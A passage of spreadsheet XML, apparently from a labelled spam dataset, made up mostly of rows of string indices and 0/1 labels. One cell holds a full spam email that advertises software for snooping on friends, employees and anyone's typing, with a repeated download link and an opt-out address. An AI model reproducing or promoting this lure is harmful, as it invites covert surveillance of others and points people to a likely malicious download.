      </c>
      <c r="B920" s="1" t="s">
        <v>1655</v>
      </c>
      <c r="C920" s="1" t="s">
        <v>1656</v>
      </c>
      <c r="D920" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="921">
      <c r="A921" s="1">
        <v>919.0</v>
      </c>
      <c r="B921" s="1" t="s">
        <v>1657</v>
      </c>
      <c r="C921" s="1" t="s">
        <v>1658</v>
      </c>
      <c r="D921" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="922">
      <c r="A922" s="1">
        <v>920.0</v>
      </c>
      <c r="B922" s="1" t="s">
        <v>1659</v>
      </c>
      <c r="C922" s="1" t="s">
        <v>1660</v>
      </c>
      <c r="D922" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="923" hidden="1">
      <c r="A923" s="1">
        <v>921.0</v>
      </c>
      <c r="B923" s="1" t="s">
        <v>1227</v>
      </c>
      <c r="C923" s="1" t="s">
        <v>1661</v>
      </c>
      <c r="D923" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="924" hidden="1">
      <c r="A924" s="1">
        <v>922.0</v>
      </c>
      <c r="B924" s="1" t="s">
        <v>1662</v>
      </c>
      <c r="C924" s="1" t="s">
        <v>1663</v>
      </c>
      <c r="D924" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="925">
      <c r="A925" s="1">
        <v>923.0</v>
      </c>
      <c r="B925" s="1" t="s">
        <v>1664</v>
      </c>
      <c r="C925" s="1" t="s">
        <v>1665</v>
      </c>
      <c r="D925" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="926" hidden="1">
      <c r="A926" s="1">
        <v>924.0</v>
      </c>
      <c r="B926" s="1" t="s">
        <v>1666</v>
      </c>
      <c r="C926" s="1" t="s">
        <v>1667</v>
      </c>
      <c r="D926" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="927" hidden="1">
      <c r="A927" s="1">
        <v>925.0</v>
      </c>
      <c r="B927" s="1" t="s">
        <v>1668</v>
      </c>
      <c r="C927" s="1" t="s">
        <v>1669</v>
      </c>
      <c r="D927" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="928" hidden="1">
      <c r="A928" s="1">
        <v>926.0</v>
      </c>
      <c r="B928" s="1" t="s">
        <v>599</v>
      </c>
      <c r="C928" s="1" t="s">
        <v>600</v>
      </c>
      <c r="D928" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="929" hidden="1">
      <c r="A929" s="1">
        <v>927.0</v>
      </c>
      <c r="B929" s="1" t="s">
        <v>1670</v>
      </c>
      <c r="C929" s="1" t="s">
        <v>1671</v>
      </c>
      <c r="D929" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="930" hidden="1">
      <c r="A930" s="1">
        <v>928.0</v>
      </c>
      <c r="B930" s="1" t="s">
        <v>1672</v>
      </c>
      <c r="C930" s="1" t="s">
        <v>1673</v>
      </c>
      <c r="D930" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="931" hidden="1">
      <c r="A931" s="1">
        <v>929.0</v>
      </c>
      <c r="B931" s="1" t="s">
        <v>1674</v>
      </c>
      <c r="C931" s="1" t="s">
        <v>1675</v>
      </c>
      <c r="D931" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="932">
      <c r="A932" s="1">
        <v>930.0</v>
      </c>
      <c r="B932" s="1" t="s">
        <v>18</v>
      </c>
      <c r="C932" s="1" t="s">
        <v>19</v>
      </c>
      <c r="D932" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="933" hidden="1">
      <c r="A933" s="1">
        <v>931.0</v>
      </c>
      <c r="B933" s="1" t="s">
        <v>512</v>
      </c>
      <c r="C933" s="1" t="s">
        <v>1676</v>
      </c>
      <c r="D933" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="934" hidden="1">
      <c r="A934" s="1">
        <v>932.0</v>
      </c>
      <c r="B934" s="1" t="s">
        <v>1677</v>
      </c>
      <c r="C934" s="1" t="s">
        <v>1678</v>
      </c>
      <c r="D934" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="935" hidden="1">
      <c r="A935" s="1">
        <v>933.0</v>
      </c>
      <c r="B935" s="1" t="s">
        <v>64</v>
      </c>
      <c r="C935" s="1" t="s">
        <v>1679</v>
      </c>
      <c r="D935" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="936" hidden="1">
      <c r="A936" s="1">
        <v>934.0</v>
      </c>
      <c r="B936" s="1" t="s">
        <v>835</v>
      </c>
      <c r="C936" s="1" t="s">
        <v>836</v>
      </c>
      <c r="D936" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="937" hidden="1">
      <c r="A937" s="1">
        <v>935.0</v>
      </c>
      <c r="B937" s="1" t="s">
        <v>1680</v>
      </c>
      <c r="C937" s="1" t="s">
        <v>1681</v>
      </c>
      <c r="D937" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="938">
      <c r="A938" s="1">
        <v>936.0</v>
      </c>
      <c r="B938" s="1" t="s">
        <v>1682</v>
      </c>
      <c r="C938" s="1" t="s">
        <v>1683</v>
      </c>
      <c r="D938" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="939" hidden="1">
      <c r="A939" s="1">
        <v>937.0</v>
      </c>
      <c r="B939" s="1" t="s">
        <v>1684</v>
      </c>
      <c r="C939" s="1" t="s">
        <v>1685</v>
      </c>
      <c r="D939" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="940" hidden="1">
      <c r="A940" s="1">
        <v>938.0</v>
      </c>
      <c r="B940" s="1" t="s">
        <v>1325</v>
      </c>
      <c r="C940" s="1" t="s">
        <v>1686</v>
      </c>
      <c r="D940" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="941" hidden="1">
      <c r="A941" s="1">
        <v>939.0</v>
      </c>
      <c r="B941" s="1" t="s">
        <v>1687</v>
      </c>
      <c r="C941" s="1" t="s">
        <v>1688</v>
      </c>
      <c r="D941" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="942" hidden="1">
      <c r="A942" s="1">
        <v>940.0</v>
      </c>
      <c r="B942" s="1" t="s">
        <v>1689</v>
      </c>
      <c r="C942" s="1" t="s">
        <v>1690</v>
      </c>
      <c r="D942" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="943">
      <c r="A943" s="1">
        <v>941.0</v>
      </c>
      <c r="B943" s="1" t="s">
        <v>1691</v>
      </c>
      <c r="C943" s="1" t="s">
        <v>1692</v>
      </c>
      <c r="D943" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="944" hidden="1">
      <c r="A944" s="1">
        <v>942.0</v>
      </c>
      <c r="B944" s="1" t="s">
        <v>1693</v>
      </c>
      <c r="C944" s="1" t="s">
        <v>1694</v>
      </c>
      <c r="D944" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="945">
      <c r="A945" s="1">
        <v>943.0</v>
      </c>
      <c r="B945" s="1" t="s">
        <v>1695</v>
      </c>
      <c r="C945" s="1" t="s">
        <v>1696</v>
      </c>
      <c r="D945" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="946">
      <c r="A946" s="1">
        <v>944.0</v>
      </c>
      <c r="B946" s="1" t="s">
        <v>1697</v>
      </c>
      <c r="C946" s="1" t="s">
        <v>1698</v>
      </c>
      <c r="D946" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="947" hidden="1">
      <c r="A947" s="1">
        <v>945.0</v>
      </c>
      <c r="B947" s="1" t="s">
        <v>908</v>
      </c>
      <c r="C947" s="1" t="s">
        <v>909</v>
      </c>
      <c r="D947" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="948" hidden="1">
      <c r="A948" s="1">
        <v>946.0</v>
      </c>
      <c r="B948" s="1" t="s">
        <v>1699</v>
      </c>
      <c r="C948" s="1" t="s">
        <v>1700</v>
      </c>
      <c r="D948" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="949" hidden="1">
      <c r="A949" s="1">
        <v>947.0</v>
      </c>
      <c r="B949" s="1" t="s">
        <v>1684</v>
      </c>
      <c r="C949" s="1" t="s">
        <v>1701</v>
      </c>
      <c r="D949" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="950">
      <c r="A950" s="1">
        <v>948.0</v>
      </c>
      <c r="B950" s="1" t="s">
        <v>1702</v>
      </c>
      <c r="C950" s="1" t="s">
        <v>1703</v>
      </c>
      <c r="D950" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="951">
      <c r="A951" s="1">
        <v>949.0</v>
      </c>
      <c r="B951" s="1" t="s">
        <v>1704</v>
      </c>
      <c r="C951" s="1" t="s">
        <v>1705</v>
      </c>
      <c r="D951" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="952" hidden="1">
      <c r="A952" s="1">
        <v>950.0</v>
      </c>
      <c r="B952" s="1" t="s">
        <v>1706</v>
      </c>
      <c r="C952" s="1" t="s">
        <v>1707</v>
      </c>
      <c r="D952" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="953" hidden="1">
      <c r="A953" s="1">
        <v>951.0</v>
      </c>
      <c r="B953" s="1" t="s">
        <v>1708</v>
      </c>
      <c r="C953" s="1" t="s">
        <v>1709</v>
      </c>
      <c r="D953" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="954" hidden="1">
      <c r="A954" s="1">
        <v>952.0</v>
      </c>
      <c r="B954" s="1" t="s">
        <v>347</v>
      </c>
      <c r="C954" s="1" t="s">
        <v>1710</v>
      </c>
      <c r="D954" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="955" hidden="1">
      <c r="A955" s="1">
        <v>953.0</v>
      </c>
      <c r="B955" s="1" t="s">
        <v>857</v>
      </c>
      <c r="C955" s="1" t="s">
        <v>858</v>
      </c>
      <c r="D955" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="956">
      <c r="A956" s="1">
        <v>954.0</v>
      </c>
      <c r="B956" s="1" t="s">
        <v>1711</v>
      </c>
      <c r="C956" s="1" t="s">
        <v>1712</v>
      </c>
      <c r="D956" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="957">
      <c r="A957" s="1">
        <v>955.0</v>
      </c>
      <c r="B957" s="1" t="s">
        <v>1713</v>
      </c>
      <c r="C957" s="1" t="s">
        <v>1714</v>
      </c>
      <c r="D957" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="958" hidden="1">
      <c r="A958" s="1">
        <v>956.0</v>
      </c>
      <c r="B958" s="1" t="s">
        <v>914</v>
      </c>
      <c r="C958" s="1" t="s">
        <v>1715</v>
      </c>
      <c r="D958" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="959" hidden="1">
      <c r="A959" s="1">
        <v>957.0</v>
      </c>
      <c r="B959" s="1" t="s">
        <v>317</v>
      </c>
      <c r="C959" s="1" t="s">
        <v>1716</v>
      </c>
      <c r="D959" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="960" hidden="1">
      <c r="A960" s="1">
        <v>958.0</v>
      </c>
      <c r="B960" s="1" t="s">
        <v>1717</v>
      </c>
      <c r="C960" s="1" t="s">
        <v>1718</v>
      </c>
      <c r="D960" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="961">
      <c r="A961" s="1">
        <v>959.0</v>
      </c>
      <c r="B961" s="1" t="s">
        <v>1719</v>
      </c>
      <c r="C961" s="1" t="s">
        <v>1720</v>
      </c>
      <c r="D961" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="962">
      <c r="A962" s="1">
        <v>960.0</v>
      </c>
      <c r="B962" s="1" t="s">
        <v>1721</v>
      </c>
      <c r="C962" s="1" t="s">
        <v>1722</v>
      </c>
      <c r="D962" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="963" hidden="1">
      <c r="A963" s="1">
        <v>961.0</v>
      </c>
      <c r="B963" s="1" t="s">
        <v>1723</v>
      </c>
      <c r="C963" s="1" t="s">
        <v>1724</v>
      </c>
      <c r="D963" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="964" hidden="1">
      <c r="A964" s="1">
        <v>962.0</v>
      </c>
      <c r="B964" s="1" t="s">
        <v>1725</v>
      </c>
      <c r="C964" s="1" t="s">
        <v>1726</v>
      </c>
      <c r="D964" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="965" hidden="1">
      <c r="A965" s="1">
        <v>963.0</v>
      </c>
      <c r="B965" s="1" t="s">
        <v>1727</v>
      </c>
      <c r="C965" s="1" t="s">
        <v>1728</v>
      </c>
      <c r="D965" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="966" hidden="1">
      <c r="A966" s="1">
        <v>964.0</v>
      </c>
      <c r="B966" s="1" t="s">
        <v>1729</v>
      </c>
      <c r="C966" s="1" t="s">
        <v>1730</v>
      </c>
      <c r="D966" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="967" hidden="1">
      <c r="A967" s="1">
        <v>965.0</v>
      </c>
      <c r="B967" s="1" t="s">
        <v>1731</v>
      </c>
      <c r="C967" s="1" t="s">
        <v>1732</v>
      </c>
      <c r="D967" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="968">
      <c r="A968" s="1">
        <v>966.0</v>
      </c>
      <c r="B968" s="1" t="s">
        <v>1733</v>
      </c>
      <c r="C968" s="1" t="s">
        <v>1734</v>
      </c>
      <c r="D968" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="969" hidden="1">
      <c r="A969" s="1">
        <v>967.0</v>
      </c>
      <c r="B969" s="1" t="s">
        <v>1735</v>
      </c>
      <c r="C969" s="1" t="s">
        <v>1736</v>
      </c>
      <c r="D969" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="970" hidden="1">
      <c r="A970" s="1">
        <v>968.0</v>
      </c>
      <c r="B970" s="1" t="s">
        <v>1737</v>
      </c>
      <c r="C970" s="1" t="s">
        <v>1738</v>
      </c>
      <c r="D970" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="971">
      <c r="A971" s="1">
        <v>969.0</v>
      </c>
      <c r="B971" s="1" t="s">
        <v>1739</v>
      </c>
      <c r="C971" s="1" t="s">
        <v>1740</v>
      </c>
      <c r="D971" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="972" hidden="1">
      <c r="A972" s="1">
        <v>970.0</v>
      </c>
      <c r="B972" s="1" t="s">
        <v>1687</v>
      </c>
      <c r="C972" s="1" t="s">
        <v>1741</v>
      </c>
      <c r="D972" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="973">
      <c r="A973" s="1">
        <v>971.0</v>
      </c>
      <c r="B973" s="1" t="s">
        <v>922</v>
      </c>
      <c r="C973" s="3" t="str">
        <f>============================================
 Brand-New VERSION 7.0 Just Released:
 Astounding New Software Lets You Find
 Out Almost ANYTHING about ANYONE...
 =============================================
 Download it right now (no charge card needed):
 For the brand-new VERSION 7.0, click here:
 &lt;a href="http://lv724super.supereva.it/gen.html"&gt;
 http://lv724super.supereva.it/gen.html &lt;/a&gt;
 Discover EVERYTHING you ever wanted to know about:
 your friends
 your family
 your enemies
 your employees
 yourself - Is Someone Using Your Identity?
 even your boss!
 DID YOU KNOW you can search for ANYONE, ANYTIME,
 ANYWHERE, right on the Internet?
 Download this software right now--click here:
 &lt;a href="http://lv724super.supereva.it/gen.html"&gt;
 http://lv724super.supereva.it/gen.html &lt;/a&gt;
 This mammoth COLLECTION of internet investigative
 tools &amp; research sites will provide you with NEARLY
 400 GIGANTIC SEARCH RESOURCES to locate information on:
 * people you trust
 * screen new tenants or roommates
 * housekeepers
 * current or past employment
 * people you work with
 * license plate number with name and address
 * unlisted phone numbers
 * long lost friends
 Locate e-mails, phone numbers, or addresses:
 o Get a Copy of Your FBI file.
 o Get a Copy of Your Military file.
 o FIND DEBTORS and locate HIDDEN ASSETS.
 o Check CRIMINAL Drug and driving RECORDS.
 o Lookup someone's EMPLOYMENT history.
 For the brand-new VERSION 7.0, click here:
 &lt;a href="http://lv724super.supereva.it/gen.html"&gt;
 http://lv724super.supereva.it/gen.html &lt;/a&gt;
 Locate old classmates, missing family
 member, or a LONG LOST LOVE:
 - Do Background Checks on EMPLOYEES before you
   hire them.
 - Investigate your family history, birth, death
   and government records!
 - Discover how UNLISTED phone numbers are located.
 - Check out your new or old LOVE INTEREST.
 - Verify your own CREDIT REPORTS so you can
   correct WRONG information.
 - Track anyone's Internet ACTIVITY; see the sites
   they visit, and what they are typing.
 - Explore SECRET WEB SITES that conventional
   search engines have never found.
 For the brand-new VERSION 7.0, click here:
 &lt;a href="http://lv724super.supereva.it/gen.html"&gt;
 http://lv724super.supereva.it/gen.html &lt;/a&gt;
 ==&gt; Discover little-known ways to make UNTRACEABLE
     PHONE CALLS.
 ==&gt; Check ADOPTION records; locate MISSING CHILDREN
     or relatives.
 ==&gt; Dig up information on your FRIENDS, NEIGHBORS,
     or BOSS!
 ==&gt; Discover EMPLOYMENT opportunities from AROUND
     THE WORLD!
 ==&gt; Locate transcripts and COURT ORDERS from all
     50 states.
 ==&gt; CLOAK your EMAIL so your true address can't
     be discovered.
 ==&gt; Find out how much ALIMONY your neighbor is paying.
 ==&gt; Discover how to check your phones for WIRETAPS.
 ==&gt; Or check yourself out, and you will be shocked at
     what you find!!
 These are only a few things you can do, There
 is no limit to the power of this software!!
 To download this software, and have it in less
 than 5 minutes click on the url below to visit
 our website (NEW: No charge card needed!)
 &lt;a href="http://lv724super.supereva.it/gen.html"&gt;
 http://lv724super.supereva.it/gen.html &lt;/a&gt;
 If you no longer wish to hear about future
 offers from us, send us a message with STOP
 in the subject line, by clicking here:
 &lt;a href="mailto:remv0615a@bk.ru?subject=STOP_GN724"&gt;
 mailto:remv0615a@bk.ru?subject=STOP_GN724 &lt;/a&gt;
 Please allow up to 72 hours to take effect.
 Please do not include any correspondence in your
 message to this automatic stop robot--it will
 not be read. All requests processed automatically.
  [:KJ)_8J7BJK9^":}H&amp;*TG0]
</f>
        <v>#ERROR!</v>
      </c>
      <c r="D973" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="974" hidden="1">
      <c r="A974" s="1">
        <v>972.0</v>
      </c>
      <c r="B974" s="1" t="s">
        <v>1027</v>
      </c>
      <c r="C974" s="1" t="s">
        <v>1742</v>
      </c>
      <c r="D974" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="975" hidden="1">
      <c r="A975" s="1">
        <v>973.0</v>
      </c>
      <c r="B975" s="1" t="s">
        <v>1743</v>
      </c>
      <c r="C975" s="1" t="s">
        <v>1744</v>
      </c>
      <c r="D975" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="976">
      <c r="A976" s="1">
        <v>974.0</v>
      </c>
      <c r="B976" s="1" t="s">
        <v>1745</v>
      </c>
      <c r="C976" s="1" t="s">
        <v>1746</v>
      </c>
      <c r="D976" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="977">
      <c r="A977" s="1">
        <v>975.0</v>
      </c>
      <c r="B977" s="1" t="s">
        <v>1747</v>
      </c>
      <c r="C977" s="1" t="s">
        <v>1748</v>
      </c>
      <c r="D977" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="978" hidden="1">
      <c r="A978" s="1">
        <v>976.0</v>
      </c>
      <c r="B978" s="1" t="s">
        <v>852</v>
      </c>
      <c r="C978" s="1" t="s">
        <v>853</v>
      </c>
      <c r="D978" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="979" hidden="1">
      <c r="A979" s="1">
        <v>977.0</v>
      </c>
      <c r="B979" s="1" t="s">
        <v>1749</v>
      </c>
      <c r="C979" s="1" t="s">
        <v>1750</v>
      </c>
      <c r="D979" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="980">
      <c r="A980" s="1">
        <v>978.0</v>
      </c>
      <c r="B980" s="1" t="s">
        <v>1751</v>
      </c>
      <c r="C980" s="1" t="s">
        <v>1752</v>
      </c>
      <c r="D980" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="981" hidden="1">
      <c r="A981" s="1">
        <v>979.0</v>
      </c>
      <c r="B981" s="1" t="s">
        <v>1753</v>
      </c>
      <c r="C981" s="1" t="s">
        <v>1754</v>
      </c>
      <c r="D981" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="982" hidden="1">
      <c r="A982" s="1">
        <v>980.0</v>
      </c>
      <c r="B982" s="1" t="s">
        <v>1755</v>
      </c>
      <c r="C982" s="1" t="s">
        <v>1756</v>
      </c>
      <c r="D982" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="983" hidden="1">
      <c r="A983" s="1">
        <v>981.0</v>
      </c>
      <c r="B983" s="1" t="s">
        <v>347</v>
      </c>
      <c r="C983" s="1" t="s">
        <v>1757</v>
      </c>
      <c r="D983" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="984">
      <c r="A984" s="1">
        <v>982.0</v>
      </c>
      <c r="B984" s="1" t="s">
        <v>1758</v>
      </c>
      <c r="C984" s="1" t="s">
        <v>1759</v>
      </c>
      <c r="D984" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="985">
      <c r="A985" s="1">
        <v>983.0</v>
      </c>
      <c r="B985" s="1" t="s">
        <v>1760</v>
      </c>
      <c r="C985" s="1" t="s">
        <v>1761</v>
      </c>
      <c r="D985" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="986">
      <c r="A986" s="1">
        <v>984.0</v>
      </c>
      <c r="B986" s="1" t="s">
        <v>1762</v>
      </c>
      <c r="C986" s="1" t="s">
        <v>1763</v>
      </c>
      <c r="D986" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="987" hidden="1">
      <c r="A987" s="1">
        <v>985.0</v>
      </c>
      <c r="B987" s="1" t="s">
        <v>1764</v>
      </c>
      <c r="C987" s="1" t="s">
        <v>1765</v>
      </c>
      <c r="D987" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="988">
      <c r="A988" s="1">
        <v>986.0</v>
      </c>
      <c r="B988" s="1" t="s">
        <v>1766</v>
      </c>
      <c r="C988" s="1" t="s">
        <v>1767</v>
      </c>
      <c r="D988" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="989" hidden="1">
      <c r="A989" s="1">
        <v>987.0</v>
      </c>
      <c r="B989" s="1" t="s">
        <v>1768</v>
      </c>
      <c r="C989" s="1" t="s">
        <v>1769</v>
      </c>
      <c r="D989" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="990" hidden="1">
      <c r="A990" s="1">
        <v>988.0</v>
      </c>
      <c r="B990" s="1" t="s">
        <v>1770</v>
      </c>
      <c r="C990" s="1" t="s">
        <v>1771</v>
      </c>
      <c r="D990" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="991" hidden="1">
      <c r="A991" s="1">
        <v>989.0</v>
      </c>
      <c r="B991" s="1" t="s">
        <v>64</v>
      </c>
      <c r="C991" s="1" t="s">
        <v>1772</v>
      </c>
      <c r="D991" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="992" hidden="1">
      <c r="A992" s="1">
        <v>990.0</v>
      </c>
      <c r="B992" s="1" t="s">
        <v>814</v>
      </c>
      <c r="C992" s="1" t="s">
        <v>1773</v>
      </c>
      <c r="D992" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="993">
      <c r="A993" s="1">
        <v>991.0</v>
      </c>
      <c r="B993" s="1" t="s">
        <v>1774</v>
      </c>
      <c r="C993" s="1" t="s">
        <v>741</v>
      </c>
      <c r="D993" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="994" hidden="1">
      <c r="A994" s="1">
        <v>992.0</v>
      </c>
      <c r="B994" s="1" t="s">
        <v>1775</v>
      </c>
      <c r="C994" s="1" t="s">
        <v>1776</v>
      </c>
      <c r="D994" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="995" hidden="1">
      <c r="A995" s="1">
        <v>993.0</v>
      </c>
      <c r="B995" s="1" t="s">
        <v>1777</v>
      </c>
      <c r="C995" s="1" t="s">
        <v>1778</v>
      </c>
      <c r="D995" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="996" hidden="1">
      <c r="A996" s="1">
        <v>994.0</v>
      </c>
      <c r="B996" s="1" t="s">
        <v>1779</v>
      </c>
      <c r="C996" s="1" t="s">
        <v>1780</v>
      </c>
      <c r="D996" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="997" hidden="1">
      <c r="A997" s="1">
        <v>995.0</v>
      </c>
      <c r="B997" s="1" t="s">
        <v>1781</v>
      </c>
      <c r="C997" s="1" t="s">
        <v>1782</v>
      </c>
      <c r="D997" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="998">
      <c r="A998" s="1">
        <v>996.0</v>
      </c>
      <c r="B998" s="1" t="s">
        <v>1783</v>
      </c>
      <c r="C998" s="1" t="s">
        <v>1784</v>
      </c>
      <c r="D998" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="999" hidden="1">
      <c r="A999" s="1">
        <v>997.0</v>
      </c>
      <c r="B999" s="1" t="s">
        <v>1785</v>
      </c>
      <c r="C999" s="1" t="s">
        <v>1786</v>
      </c>
      <c r="D999" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1000" hidden="1">
      <c r="A1000" s="1">
        <v>998.0</v>
      </c>
      <c r="B1000" s="1" t="s">
        <v>1787</v>
      </c>
      <c r="C1000" s="1" t="s">
        <v>1788</v>
      </c>
      <c r="D1000" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1001">
      <c r="A1001" s="1">
        <v>999.0</v>
      </c>
      <c r="B1001" s="1" t="s">
        <v>1789</v>
      </c>
      <c r="C1001" s="1" t="s">
        <v>1790</v>
      </c>
      <c r="D1001" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1002">
      <c r="A1002" s="1">
        <v>1000.0</v>
      </c>
      <c r="B1002" s="1" t="s">
        <v>1791</v>
      </c>
      <c r="C1002" s="1" t="s">
        <v>1792</v>
      </c>
      <c r="D1002" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1003" hidden="1">
      <c r="A1003" s="1">
        <v>1001.0</v>
      </c>
      <c r="B1003" s="1" t="s">
        <v>30</v>
      </c>
      <c r="C1003" s="1" t="s">
        <v>1793</v>
      </c>
      <c r="D1003" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1004">
      <c r="A1004" s="1">
        <v>1002.0</v>
      </c>
      <c r="B1004" s="1" t="s">
        <v>1794</v>
      </c>
      <c r="C1004" s="1" t="s">
        <v>1795</v>
      </c>
      <c r="D1004" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1005" hidden="1">
      <c r="A1005" s="1">
        <v>1003.0</v>
      </c>
      <c r="B1005" s="1" t="s">
        <v>40</v>
      </c>
      <c r="C1005" s="1" t="s">
        <v>1796</v>
      </c>
      <c r="D1005" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1006" hidden="1">
      <c r="A1006" s="1">
        <v>1004.0</v>
      </c>
      <c r="B1006" s="1" t="s">
        <v>1797</v>
      </c>
      <c r="C1006" s="1" t="s">
        <v>1798</v>
      </c>
      <c r="D1006" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1007" hidden="1">
      <c r="A1007" s="1">
        <v>1005.0</v>
      </c>
      <c r="B1007" s="1" t="s">
        <v>1799</v>
      </c>
      <c r="C1007" s="1" t="s">
        <v>1800</v>
      </c>
      <c r="D1007" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1008" hidden="1">
      <c r="A1008" s="1">
        <v>1006.0</v>
      </c>
      <c r="B1008" s="1" t="s">
        <v>315</v>
      </c>
      <c r="C1008" s="1" t="s">
        <v>1801</v>
      </c>
      <c r="D1008" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1009" hidden="1">
      <c r="A1009" s="1">
        <v>1007.0</v>
      </c>
      <c r="B1009" s="1" t="s">
        <v>1802</v>
      </c>
      <c r="C1009" s="1" t="s">
        <v>1803</v>
      </c>
      <c r="D1009" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1010">
      <c r="A1010" s="1">
        <v>1008.0</v>
      </c>
      <c r="B1010" s="1" t="s">
        <v>1804</v>
      </c>
      <c r="C1010" s="1" t="s">
        <v>1805</v>
      </c>
      <c r="D1010" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1011">
      <c r="A1011" s="1">
        <v>1009.0</v>
      </c>
      <c r="B1011" s="1" t="s">
        <v>1806</v>
      </c>
      <c r="C1011" s="1" t="s">
        <v>1807</v>
      </c>
      <c r="D1011" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1012" hidden="1">
      <c r="A1012" s="1">
        <v>1010.0</v>
      </c>
      <c r="B1012" s="1" t="s">
        <v>1808</v>
      </c>
      <c r="C1012" s="1" t="s">
        <v>1809</v>
      </c>
      <c r="D1012" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1013">
      <c r="A1013" s="1">
        <v>1011.0</v>
      </c>
      <c r="B1013" s="1" t="s">
        <v>1810</v>
      </c>
      <c r="C1013" s="1" t="s">
        <v>1811</v>
      </c>
      <c r="D1013" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1014" hidden="1">
      <c r="A1014" s="1">
        <v>1012.0</v>
      </c>
      <c r="B1014" s="1" t="s">
        <v>1812</v>
      </c>
      <c r="C1014" s="1" t="s">
        <v>1813</v>
      </c>
      <c r="D1014" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1015" hidden="1">
      <c r="A1015" s="1">
        <v>1013.0</v>
      </c>
      <c r="B1015" s="1" t="s">
        <v>1814</v>
      </c>
      <c r="C1015" s="1" t="s">
        <v>1815</v>
      </c>
